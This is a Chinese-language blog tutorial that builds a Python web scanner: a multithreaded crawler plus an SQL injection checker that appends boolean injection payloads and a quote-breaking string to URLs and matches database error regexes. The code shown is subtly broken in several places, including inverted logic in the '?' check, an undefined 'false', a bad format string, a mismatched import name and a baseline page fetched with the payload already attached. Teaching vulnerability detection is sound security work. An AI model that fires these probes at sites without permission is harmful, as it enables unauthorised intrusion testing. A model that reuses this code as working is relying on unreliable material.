扫描器需要实现的功能思维导图
爬虫编写思路
首先需要开发一个爬虫用于收集网站的链接,爬虫需要记录已经爬取的链接和待爬取的链接,并且去重,用Python的set()
就可以解决,大概流程是:
- 输入URL
- 下载解析出URL
- URL去重,判断是否为本站
- 加入到待爬列表
- 重复循环
SQL判断思路
- 通过在URL后面加上
AND %d=%d
或者OR NOT (%d>%d)
%d
后面的数字是随机可变的- 然后搜索网页中特殊关键词,比如:
MySQL 中是 SQL syntax.*MySQL
Microsoft SQL Server 是 Warning.*mssql_
Microsoft Access 是 Microsoft Access Driver
Oracle 是 Oracle error
IBM DB2 是 DB2 SQL error
SQLite 是 SQLite.Exception
...
- 通过这些关键词就可以判断出所用的数据库
- 还需要判断一下waf之类的东西,有这种东西就直接停止。简单的方法就是用特定的URL访问,如果出现了像
IP banned
,fierwall
之类的关键词,可以判断出是waf
。具体的正则表达式是(?i)(\A|\b)IP\b.*\b(banned|blocked|bl(a|o)ck\s?list|firewall)
开发准备
请安装这些库
pip install requests
pip install beautifulsoup4
实验环境是Linux,创建一个Code
目录,在其中创建一个work
文件夹,将其作为工作目录
目录结构
/w8ay.py // 项目启动主文件
/lib/core // 核心文件存放目录
/lib/core/config.py // 配置文件
/script // 插件存放
/exp // exp和poc存放
步骤
SQL检测脚本编写
DBMS_ERRORS = {
'MySQL': (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
通过正则表达式就可以判断出是哪个数据库了
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if (re.search(regex,_content)):
return True
下面是我们测试语句的payload
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
用报错语句返回正确的内容和错误的内容进行对比
for test_payload in BOOLEAN_TESTS:
# Right Page
RANDINT = random.randint(1, 255)
_url = url + test_payload % (RANDINT, RANDINT)
content["true"] = Downloader.get(_url)
_url = url + test_payload % (RANDINT, RANDINT + 1)
content["false"] = Downloader.get(_url)
if content["origin"] == content["true"] != content["false"]:
return "sql found: %" % url
这句
content["origin"] == content["true"] != content["false"]
意思就是当原始网页等于正确的网页不等于错误的网页内容时,就可以判定这个地址存在注入漏洞
完整代码:
import re, random
from lib.core import Download
def sqlcheck(url):
if (not url.find("?")): # Pseudo-static page
return false;
Downloader = Download.Downloader()
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
DBMS_ERRORS = {
# regular expressions used for DBMS recognition based on error message response
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
_url = url + "%29%28%22%27"
_content = Downloader.get(_url)
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if (re.search(regex,_content)):
return True
content = {}
content['origin'] = Downloader.get(_url)
for test_payload in BOOLEAN_TESTS:
# Right Page
RANDINT = random.randint(1, 255)
_url = url + test_payload % (RANDINT, RANDINT)
content["true"] = Downloader.get(_url)
_url = url + test_payload % (RANDINT, RANDINT + 1)
content["false"] = Downloader.get(_url)
if content["origin"] == content["true"] != content["false"]:
return "sql found: %" % url
将这个文件命名为sqlcheck.py
,放在/script
目录中。代码的第4行作用是查找URL是否包含?
,如果不包含,比方说伪静态页面,可能不太好注入,因此需要过滤掉
爬虫的编写
爬虫的思路上面讲过了,先完成URL的管理,我们单独将它作为一个类,文件保存在/lib/core/UrlManager.py
#-*- coding:utf-8 -*-
class UrlManager(object):
def __init__(self):
self.new_urls = set()
self.old_urls = set()
def add_new_url(self, url):
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
def add_new_urls(self, urls):
if urls is None or len(urls) == 0:
return
for url in urls:
self.add_new_url(url)
def has_new_url(self):
return len(self.new_urls) != 0
def get_new_url(self):
new_url = self.new_urls.pop()
self.old_urls.add(new_url)
return new_url
为了方便,我们也将下载功能单独作为一个类使用,文件保存在lib/core/Downloader.py
#-*- coding:utf-8 -*-
import requests
class Downloader(object):
def get(self, url):
r = requests.get(url, timeout = 10)
if r.status_code != 200:
return None
_str = r.text
return _str
def post(self, url, data):
r = requests.post(url, data)
_str = r.text
return _str
def download(self, url, htmls):
if url is None:
return None
_str = {}
_str["url"] = url
try:
r = requests.get(url, timeout = 10)
if r.status_code != 200:
return None
_str["html"] = r.text
except Exception as e:
return None
htmls.append(_str)
特别说明,因为我们要写的爬虫是多线程的,所以类中有个download
方法是专门为多线程下载专用的
在lib/core/Spider.py
中编写爬虫
#-*- coding:utf-8 -*-
from lib.core import Downloader, UrlManager
import threading
from urllib import parse
from urllib.parse import urljoin
from bs4 import BeautifulSoup
class SpiderMain(object):
def __init__(self, root, threadNum):
self.urls = UrlManager.UrlManager()
self.download = Downloader.Downloader()
self.root = root
self.threadNum = threadNum
def _judge(self, domain, url):
if (url.find(domain) != -1):
return True
return False
def _parse(self, page_url, content):
if content is None:
return
soup = BeautifulSoup(content, 'html.parser')
_news = self._get_new_urls(page_url, soup)
return _news
def _get_new_urls(self, page_url, soup):
new_urls = set()
links = soup.find_all('a')
for link in links:
new_url = link.get('href')
new_full_url = urljoin(page_url, new_url)
if (self._judge(self.root, new_full_url)):
new_urls.add(new_full_url)
return new_urls
def craw(self):
self.urls.add_new_url(self.root)
while self.urls.has_new_url():
_content = []
th = []
for i in list(range(self.threadNum)):
if self.urls.has_new_url() is False:
break
new_url = self.urls.get_new_url()
## sql check
try:
if (sqlcheck.sqlcheck(new_url)):
print("url:%s sqlcheck is valueable" % new_url)
except:
pass
print("craw:" + new_url)
t = threading.Thread(target = self.download.download, args = (new_url, _content))
t.start()
th.append(t)
for t in th:
t.join()
for _str in _content:
if _str is None:
continue
new_urls = self._parse(new_url, _str["html"])
self.urls.add_new_urls(new_urls)
爬虫通过调用craw()
方法传入一个网址进行爬行,然后采用多线程的方法下载待爬行的网站,下载之后的源码用_parse
方法调用BeautifulSoup
进行解析,之后将解析出的URL列表丢入URL管理器,这样循环,最后只要爬完了网页,爬虫就会停止
threading
库可以自定义需要开启的线程数,线程开启后,每个线程会得到一个url进行下载,然后线程会阻塞,阻塞完毕后线程放行
爬虫和SQL检查的结合
在lib/core/Spider.py
文件引用一下from script import sqlcheck
,在craw()
方法中,取出新的URL地方调用一下
##sql check
try:
if(sqlcheck.sqlcheck(new_url)):
print("url:%s sqlcheck is valueable"%new_url)
except:
pass
用try
检测可能出现的异常,绕过它,在文件w8ay.py
中进行测试
#-*- coding:utf-8 -*-
'''
Name: w8ayScan
Author: mathor
Copyright (c) 2019
'''
import sys
from lib.core.Spider import SpiderMain
def main():
root = "https://wmathor.com"
threadNum = 50
w8 = SpiderMain(root, threadNum)
w8.craw()
if __name__ == "__main__":
main()
很重要的一点!为了使得lib
和script
文件夹中的.py
文件可以可以被认作是模块,请在lib
、lib/core
和script
文件夹中创建__init__.py
文件,文件中什么都不需要写
总结
- SQL注入检测通过一些
payload
使页面出错,判断原始网页,正确网页,错误网页即可检测出是否存在SQL注入漏洞 - 通过匹配出sql报错出来的信息,可以正则判断所用的数据库
[...]Via www.wmathor.com[...]
[...]Via www.wmathor.com[...]